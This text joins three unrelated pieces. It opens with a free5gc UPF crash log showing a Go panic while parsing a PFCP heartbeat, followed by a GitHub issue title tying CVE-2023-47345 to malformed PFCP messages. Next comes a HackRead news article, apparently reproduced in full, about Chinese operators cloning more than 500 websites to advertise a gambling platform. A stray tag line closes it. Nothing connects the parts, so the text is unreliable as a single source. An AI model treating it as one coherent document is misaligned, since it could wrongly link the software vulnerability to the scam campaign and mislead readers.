time="2023-09-22T03:24:52.058728637+08:00" level="info" msg="handleAssociationSetupRequest" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:52.058889668+08:00" level="info" msg="New node" CAT="PFCP" CPNodeID="10.100.200.100" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:24:52.058307700+08:00" level="fatal" msg="panic: runtime error: slice bounds out of range \[6:4\]\\ngoroutine 6 \[running\]:\\nruntime/debug.Stack()\\n\\t/snap/go/10339/src/runtime/debug/stack.go:24 +0x5e\\ngithub.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main.func1()\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x4a\\npanic({0x84f480?, 0xc0001c4318?})\\n\\t/snap/go/10339/src/runtime/panic.go:914 +0x21f\\ngithub.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc00028f578?, 0xc00028f570?, 0x7f0972c4e640?})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:637 +0x185\\ngithub.com/wmnsk/go-pfcp/message.(\*HeartbeatRequest).UnmarshalBinary(0xc0002935c0, {0xc00028f570, 0x10, 0x10})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/heartbeat-request.go:101 +0xb3\\ngithub.com/wmnsk/go-pfcp/message.Parse({0xc00028f570, 0x10, 0x10})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/message.go:117 +0x325\\ngithub.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main(0xc0005ba0d0, 0xc00007a9d0)\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x48b\\ncreated by github.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).Start in goroutine 1\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xb8\\n" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"

CVE-2023-47345: [Bugs] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero · Issue #483 · free5gc/free5gc

By Waqas
Chinese scammers have been creating cloned versions of legitimate websites, redirecting visitors to gambling sites.
This is a post from HackRead.com Read the original post: Chinese Scammers Exploit Cloned Websites in Vast Gambling Network

The large-scale scam campaign has been ongoing for at least two years, and the cloned websites are still operational.

Online gambling is a booming industry, and the Asia-Pacific region has become the hub of gambling in the world, with China and India leading the way. However, this unexpected rise has led to a sharp incline in illegal activities such as money laundering, online scams, and fraud.

In October 2023, Hackread reported a scam campaign discovered by CloudSEK involving Chinese scammers targeting the Indian digital payment system using illegal instant loan apps. Now, an even bigger scam has come to the fore.

According to Qurium Media, a Swedish nonprofit provider of digital security solutions, Chinese scammers have been creating cloned versions of legitimate websites, redirecting visitors to gambling sites.

It all began when MindaNews discovered a Chinese clone of their website and promptly notified Qurium. For context, MindaNews is a Philippine newspaper headquartered in Davao City and serves as the news outlet for the Mindanao Institute of Journalism.

MindaNews’ clone (mmart-inn.com) was registered in China. It had been replicating the newspaper’s content (news, photos, opinion pieces) illegally after translating it into Chinese for the past two years, the most recent translation being of content from February 2023.

Original MindaNews website (left) – Fake MindaNews website (right) – (Credit: Qurium)

“Some MindaNews authors were retained in their English names, while others were translated into Chinese. However, in general, the content is the same when translated to English,” explained MindaNews in its blog post.

The company dug deeper and found more than 500 cloned websites, many of which were of academic institutions, and all were promoting gambling services based in China. 

It is important to note that in August 2023, the Chinese APT group Bronze Starlight was reported to be using stolen Ivacy VPN certificates to sign malware targeting the Southeast Asian gambling sector. However, as of now, it remains unclear if that attack campaign was related to the ongoing website cloning attack.

The cloned websites were hosted on two /24 networks operated by the US-based, Eonix Corporation-owned ServerHub and included websites from public libraries, universities, and private businesses.

All the clones were created in September 2021 and promoted a gambling platform called ‘188bet’ (520xingyun.com/from/188bet.php) through advertisements.

These ads contained a physical address in the Isle of Man, where many other gambling firms (including Kaiyun, BetVictor, Raybet, or Manbetx) were already registered. A website 520xingyun{.}com was hosting a large number of such ads.

Moreover, all the companies were registered in July 2021 through the domain registrar Gname.com Pte. LTD, employing a white-label partnership with TGP Europe and Cube Limited. Both Cube Limited and 188bet have affiliations with the Isle of Man.

These companies served as intermediaries from Asian gaming partners. Further probing revealed that TGP Europe was based in the UK and was found guilty of social responsibility failures and anti-money laundering.

Campaign overview (Credit: Qurium)

According to Qurium’s report, Gname was involved in different WIPO cases of domains used for ads. It is worth noting that 188bet has officers in Makati, Philippines, which is a standard practice. 

> _“These Chinese gambling companies are often headquartered in nearby nations like Vietnam and the Philippines due to the fact that gambling is banned in China.”_
> 
> Qurium

So far, ServerHub has not taken any action against the client for cloning hundreds of websites, as it is still investigating the claims. As the report develops, Hackread.com will monitor the situation and provide updates to readers accordingly.

****_RELATED ARTICLES_****

1.  **Domain Squatting and Brand Hijacking: A Silent Threat**
2.  **Chinese APT Posing as Cloud Services to Spy on Cambodia**
3.  **Chinese APT spying on Vietnam military with FoundCore RAT**
4.  **Hackers attack Casino’s fish tank thermometer to obtain data**
5.  **ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store**

Tag

#git